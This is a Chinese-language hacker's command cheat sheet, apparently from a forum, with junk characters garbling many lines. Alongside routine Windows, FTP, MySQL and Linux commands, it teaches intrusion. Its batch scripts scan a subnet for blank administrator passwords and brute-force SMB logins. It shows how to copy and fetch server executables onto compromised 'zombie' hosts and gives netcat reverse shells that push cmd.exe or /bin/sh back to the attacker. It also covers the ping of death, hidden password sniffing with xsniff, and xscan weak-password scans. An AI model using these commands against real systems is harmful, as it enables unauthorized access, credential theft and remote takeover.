DOS- 命令行

542573107

net use \\ip\ipc$ " " /user:" " 建立IPC空链接
* |; ^$ d, l; Y; i8 L+ Y. p$ ^net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
  F5 D- x: C% j) x  r6 \) M5 f' p. o* Lnet use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
net use h: \\ip\c$ 登陆后映射对方C：到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
8 j: t; N9 Z6 A( F5 c5 V  G$ E4 G5 cnet use h: /del 删除映射对方到本地的为H:的映射
& a% ]6 t+ O7 D1 Q, u! S# s* cnet user 用户名　密码　/add 建立用户
$ l' i1 S' K2 l% t# s% V; c! n5 fnet user guest /active:yes 激活guest用户
' m. Z& i4 \9 ~0 X" lnet user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
net start 查看开启了哪些服务
" M! T0 {% B+ j- y4 ~. X1 y' L* Onet start 服务名　 开启服务；(如:net start telnet， net start schedule)
; {4 |- J+ }+ ^0 W7 @4 s+ X; bnet stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
+ R: s$ q/ N& enet view 查看本地局域网内开启了哪些共享
* p( I& h: U8 V& knet view \\ip 查看对方局域网内开启了哪些共享
( {1 Q0 G8 ^4 I' C3 R' Tnet config 显示系统网络设置
% o6 _) e' e1 {' n2 D% p  K/ X# Wnet logoff 断开连接的共享
net pause 服务名 暂停某服务
7 `0 G& r3 ~, G" Ynet send ip "文本信息" 向对方发信息
' U* R2 V, `- N8 L$ Q! Dnet ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
0 Z: s8 L1 x( p* dnet share ipc$ 开启ipc$共享
, Y$ K6 P/ y% A- N1 s1 r" qnet share ipc$ /del 删除ipc$共享
4 A9 r$ B  H% U3 H2 }net share c$ /del 删除C：共享
" p* M( \9 Z( D+ o5 |0 Q3 Znet user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
: G4 V# k8 T% ~5 ynetstat -a 查看开启了哪些端口,常用netstat -an
8 ^% r! B4 \) f  F* unetstat -n 查看端口的网络连接情况，常用netstat -an
/ }7 ?- |( {" m) r# T& `netstat -v 查看正在进行的工作
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
  r  x3 Y3 Z( Z8 O4 f$ H0 cnetstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
' \6 s/ F# k1 H1 M0 Hipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
1 j. F1 ?$ K+ ctlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

( v$ ]) S& \9 v* O) K' ]: J#2 二：
/ p9 Y) o4 J& L- Y$ t3 X! ]. G" x2 r
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
/ A9 b7 k0 \7 |) b: Qat id号 开启已注册的某个计划任务
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
# S5 @* Z7 L  F) P8 d3 X/ j- C% b. Q1 fat \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
, Q( A5 A# l* h! z+ vtelnet ip 端口 远和登陆服务器,默认端口为23
6 b5 B/ N' ~4 c0 F" gopen ip 连接到IP（属telnet登陆后的命令）
3 E6 V( ^0 N* _. E6 ~( s5 U1 ctelnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下
- g8 p4 D0 M% ]; W$ _9 {1 Wcppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
1 G+ Y4 o7 K( }5 @8 |xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
6 M6 d; \; l1 b' _- ?tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
! h0 R: c4 N/ {' q/ ^3 ?tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
, f2 Y  A+ ]$ @- D. w# s. `  h  Eftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
6 N4 v8 {. E$ X# S' Proute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
* C2 k! A: L# |1 U9 }mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件（目录）的属性
$ @3 x9 L; C; ?4 s* F$ S5 z, O( cattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序，并显示出：请按任意键继续....
+ Z" y2 W  u, f6 j$ }; H  _6 Oif 在批处理程序中执行条件处理（更多说明见if命令及变量）
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
4 t4 s) p- ]8 V  Kecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
! k5 e5 J8 h5 |: |$ gfind 文件名 查找某文件
0 p2 y* b5 B! ?& l1 R- btitle 标题名字 更改CMD窗口标题名字
* k; [8 y$ c$ m6 K# G. ~color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
- ]6 L4 n5 U! u" L# Cprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

542573107

#3 三：
7 H0 A) \0 e& L
+ A6 g1 x7 X% e" Z1 kver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
& N: w6 l; h) W2 V) u7 b0 J6 i4 M: uformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md　目录名 创建目录
4 ~: B- I+ {% e+ Y, }replace 源文件　要替换文件的目录 替换文件
ren 原文件名　新文件名 重命名文件名
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
- U* I9 i7 Q+ @7 t; f0 stype 文件名 显示文本文件的内容
. Z0 Q, Z1 f2 A6 I2 i+ A" R2 T5 Fmore 文件名 逐屏显示输出文件
doskey 要锁定的命令＝字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
taskmgr 调出任务管理器
) |' x; R, H; ^8 a. z! v( C% Dchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
& @; Y; H4 v9 C1 N' {0 Qexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
0 {0 _: H$ |" g) n- E( Z  Apath 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
$ r% X# F% ^, M% @! Nregedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
0 M* J2 f2 ]8 E* _% t; mregedit /e 注册表文件名 导出注册表
: n2 k& Q& h& l5 _* P3 G) |cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
# ]9 P% ^, G. r& G4 b9 {# cREM 文本内容 在批处理文件中添加注解
0 m, ?) [% R" O7 r$ o7 V3 b. fnetsh 查看或更改本地网络配置情况

, a' K  n# d# B& f7 [6 R1 j$ v#4 四：
7 |  s! ]- u9 {( Q& s2 }+ h6 M3 I  M' Z
IIS服务命令：
6 |% B% q5 q, C/ y6 J! \5 p. Viisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
iisreset /start或stop 启动（停止）所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
, C+ v% T7 Z( t( K7 v9 ~! Jiisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
4 u: D! f: A7 {! P1 D5 @7 r& S5 Oiisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
- c5 O9 J' Q: L  sFTP 命令： (后面有详细说明内容)
* K: J& x8 l9 P3 u7 R/ s# t3 }- yftp的命令行格式为:
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
－d 使用调试方式。
' n3 B" ~2 `4 ~( T% O－n 限制ftp的自动登录,即不使用.netrc文件。
－g 取消全局文件名。
6 W  D- j; f( }  Thelp [命令] 或 ？[命令] 查看命令说明
. u) l( w/ I" q  j- O1 z9 U9 M0 E7 Abye 或 quit 终止主机FTP进程,并退出FTP管理方式.
% r' z, Z. T0 g+ D0 Dpwd 列出当前远端主机目录
# x; V! z# _2 V& C$ k% Qput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
0 m+ h- ^. `5 u( y1 Rdir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
& Z4 |1 d% f2 i% S. gascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
; Q- f# \) Q! x# Ucdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
9 O7 y( Z' a% oopen host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
8 {1 Q+ F$ v3 z! amdelete [remote-files] 删除一批文件
( a& ~& o# u3 V9 E6 C2 }mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
% M! \% J' |! X! }1 q) ystatus 显示当前FTP的状态
- p; U1 L* M/ K. y2 }system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
. i' t& q8 c. `$ c3 U9 I" Klcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote－dir 进入远程主机目录
" d( ?+ B8 x& F; E; d4 Ncdup 进入远程主机目录的父目录
- V: }) f; B) \# m9 z! z3 ]! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
% e5 P- V2 q4 w: C
3 D7 Z% h6 [( h0 t; q$ @0 }) ]* b#5 五：
) N0 p' T. w4 G* v5 O" T5 ]
MYSQL 命令：
6 x- z+ f: F* K! X" n  gmysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
9 I# y5 h  ~" b+ D6 C（例：mysql -h110.110.110.110 -Uroot -P123456
6 J; [( c& z( E$ D3 r注:u与root可以不用加空格，其它也一样）
exit 退出MYSQL
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
/ A3 P. C0 N( c+ e/ k" V/ b2 |use mysql；
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
" A4 g- w% q1 C3 v* P7 ouse 库名；
( E& P5 F2 {6 m# vcreate table 表名 (字段设定列表)； 建表
- _2 i! K/ W/ l) Xdrop database 库名;
+ n, E: T1 U5 M2 ~0 rdrop table 表名； 删库和删表
0 j2 R' Z& S3 X  L) [* Wdelete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
4 P7 b: B) @' r3 zmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的\\mysql\\bin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
win2003系统下新增命令（实用部份）：
shutdown /参数 关闭或重启本地或远程主机。
9 i2 J; v8 u( ]. Q9 o% v参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
例：shutdown /r /t 0 立即重启本地主机（无延时）
  H3 w/ H9 ?1 ^6 T6 \taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
; [" @: [2 I7 q4 }8 b0 b$ x- D参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
8 P, ]: q9 \1 k4 ~tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
) d$ X+ O1 b1 d$ I. L参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。

#6 六：
: ~+ e# ]3 Q. F7 K6 j
Linux系统下基本命令： 要区分大小写
uname 显示版本信息（同win2K的 ver）
, R' z8 y1 ?' T# \dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
pwd 查询当前所在的目录位置
" v  i4 j$ O7 C! b4 tcd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
/ t$ ^9 U; F! Q2 r. c' C0 K! r( P  Ccat 文件名 查看文件内容
4 T8 j1 N0 v/ {& scat >abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
9 {3 I' h: U6 h$ N# j  @' Omv 移动文件
8 [% R3 o0 z0 R& ~3 t: r, L) qrm 文件名 删除文件，rm -a 目录名删除目录及子目录
) N. X" B6 q9 [' Z4 l1 {mkdir 目录名 建立目录
" S( I5 O0 h% x( j  _rmdir 删除子目录，目录内没有文档。
# Q  i0 a/ P6 _& Ychmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
% d) o6 ~4 p6 R5 m* g; T0 n) yfind 档案搜寻
2 ^2 A& L* [/ S, f$ c  }: zdate 现在的日期、时间
4 D' ~5 W5 d0 g2 y( y5 A) s2 ^who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
! E; M, A: V, K# j: ^3 l& O& ?groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
! c5 V% D4 r7 p7 nkill 停止某进程
0 A- K7 V! u5 g$ ~4 O6 igcc 黑客通常用它来编译C语言写的文件
& }# }' ~; V: Q7 Ysu 权限转换为指定使用者
' D4 y' q" D( i, j9 U4 jtelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
+ B6 _2 }: e: n! {" C3 K4 Z* L: R. pftp ftp连接上某服务器（同win2K）
8 y3 a- S  A  y- _, M' D
附：批处理命令与变量
) Z: i7 o7 S+ _7 i+ l
$ G$ ]' w) m5 J4 y4 X( V" K1：for命令及变量 基本格式：
# Z/ _3 ]7 s" Y! n, LFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

: ?$ u) D. L/ u' y+ I(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1 }
  s  D! Y8 L6 v0 a4 f2 t2 ^
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
command_parameters：为特定命令指定参数或命令行开关
9 F" l3 ~" R+ Z# ?
IN (set)：指在(set)中取值；DO command ：指执行command

- g; ]3 U( r5 e. S参数：/L 指用增量形式{ (set)为增量形式时 }；/F 指从文件中不断取值，直到取完为止{ (set)为文件时，如(d:\pass.txt)时 }。
用法举例：
" [6 v: z5 `0 M: l% [2 k0 D@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
2 W2 }( a) G, i1 b& I- Q' T存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。
' [5 x  B1 P" D% g9 E
* J( J, y' H$ m$ g8 V/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
  w9 q$ Y0 P  o# e存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。

542573107

#7 七：

2：if命令及变量 基本格式：
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
# C% z6 N$ N: S' }IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
7 y8 V; t+ U: b# W0 r: z" QIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”
" t: |9 t, {& K+ @1 M) H0 P  x
  \, z' n' X( }% P: \1 N: H（二）系统外部命令(均需下载相关工具)：
- K: l9 D! Q" Y$ W3 f' O/ n; S
; G2 U# s( I5 ]: A/ }1 P1、瑞士军刀：nc.exe

" R0 d  M9 q: X" T) K5 L参数说明：
, g4 Y4 f) q. S; h9 Z4 X) ^-h 查看帮助信息
; J# `3 M" p% s* |1 J$ P4 V-d 后台模式
* a* v7 g4 X% c6 c" a+ b-e prog程序重定向，一但连接就执行［危险］
-i secs延时的间隔
/ F# S' K8 m* g  x1 |6 v1 R, D-l 监听模式，用于入站连接
2 x; _- Y' [5 @! F( T+ d; E2 v-L 监听模式，连接天闭后仍然继续监听，直到CTR+C
' h" Y) t% z1 _1 Z-n IP地址，不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
4 d2 s. ?4 B6 f5 O* X" N-r 随机本地及远程端口
/ ^9 A+ ?  d" f7 {; P) v0 [. m-t 使用Telnet交互方式
" m8 y9 V: w- m0 X% G-u UDP模式
) l: ?  w  N# q-v 详细输出，用-vv将更详细
  h6 R5 r5 {; u; z0 f& W( M- c-w数字 timeout延时间隔
6 C2 ^- r1 U  G: [$ h-z 将输入，输出关掉（用于扫锚时）
基本用法：
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
高级用法：
nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止
nc -L -p 80 > c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
4 D4 j4 @" q* m  F. {! K本机上用：nc -l -p 本机端口
1 g* S; g' |# x9 F2 l! l在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
: E6 A. L/ {5 m/ s本机上用：nc -d -l -p 本机端口 < 要传送的文件路径及名称
6 P4 C/ u) k: v8 p9 d在对方主机上用：nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
备 注：
' w3 V4 ]0 [/ ^! j* V| 管道命令
) r( G$ @% M5 H1 M7 p  z0 `8 W5 e< 或 > 重定向命令。“<”，例如：tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令
  o# x5 I3 K2 v3 @# P+ f1 x$ `＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt >> d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中
>与>>的区别 　">"指：覆盖；">>"指：保存到(添加到）。
如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别执行二次比较看：用>>的则是把二次的结果都保存了，而用：>则只有一次的结果，是因为第二次的结果把第一次的覆盖了。
/ D. J- l: T+ S$ M. X) I
4 _& f3 ~% e5 p; j! I5 Z#8 八：

2、扫锚工具：xscan.exe
( c0 r6 o. C+ \
基本格式
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息
. P/ l  K" R4 wxscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
检测项目
$ O1 o! P, h6 }1 b( q4 I-active 检测主机是否存活
+ ~  t9 ^$ |: z; T  r" c$ r-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）
1 E" I- Y6 K( i; ]  l-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
8 }* h* u% I$ W, ~$ z-smtp 检测SMTP-Server漏洞
-sql 检测SQL-Server弱口令
-smb 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
9 h+ P+ ^7 Z4 d# }-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
  D+ Y' [  i: n-all 检测以上所有项目
其它选项
, i$ t& h& e" i5 F3 N% u0 ?-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取
-l 显示所有网络适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
, r3 e8 n9 O' h# O0 \$ v　 -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)
* k) ^6 l8 I7 F+ u' U& J" C$ Z用法示例
  {( b9 S" C7 z7 K, Hxscan -host 192.168.1.1-192.168.255.255 -all -active -p　 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机
* v$ h( k( C6 U1 ]- Yxscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机
3 z  |" ~* d$ U5 U& x9 kxscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机
; {- A! Q+ F/ ?- T0 A1 H. I4 I! x
+ m+ W9 c& v1 K: U8 A#9 九：
- n  G- P) D! U1 Q& x" V; G
4 s; [, j2 s6 @3、命令行方式嗅探器: xsniff.exe
( \* V7 ~) K$ R% @" g& a3 m可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
% g( q4 S% U% J7 Z9 W  n参数说明
-tcp 输出TCP数据报
# M2 n& |9 x( n; o0 ?, ]% H6 y/ B-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
( E9 W, s0 m. S: F* u-hide 后台运行
* ?7 m- a4 Y# b' ^3 w-host 解析主机名
0 f  J  D7 s8 Y, j-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
5 f2 G& y& ^- G8 d$ S( R2 a% q-asc 以ASCII形式输出
-hex 以16进制形式输出
$ w9 e% H0 i3 G  Q! E3 s: `+ M  m用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中
7 A* D) W0 ^. E2 y7 s. X" lxsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出

: q& K+ _  X3 q8 p( M4、终端服务密码破解: tscrack.exe

8 [2 N: k% `: ]  V7 O参数说明
( U8 J5 D* ]2 ^-h 显示使用帮助
" Y" e9 O, Y$ }5 z& k8 ~-v 显示版本信息
8 I% ]0 Z/ z  v/ ^3 s-s 在屏幕上打出解密能力
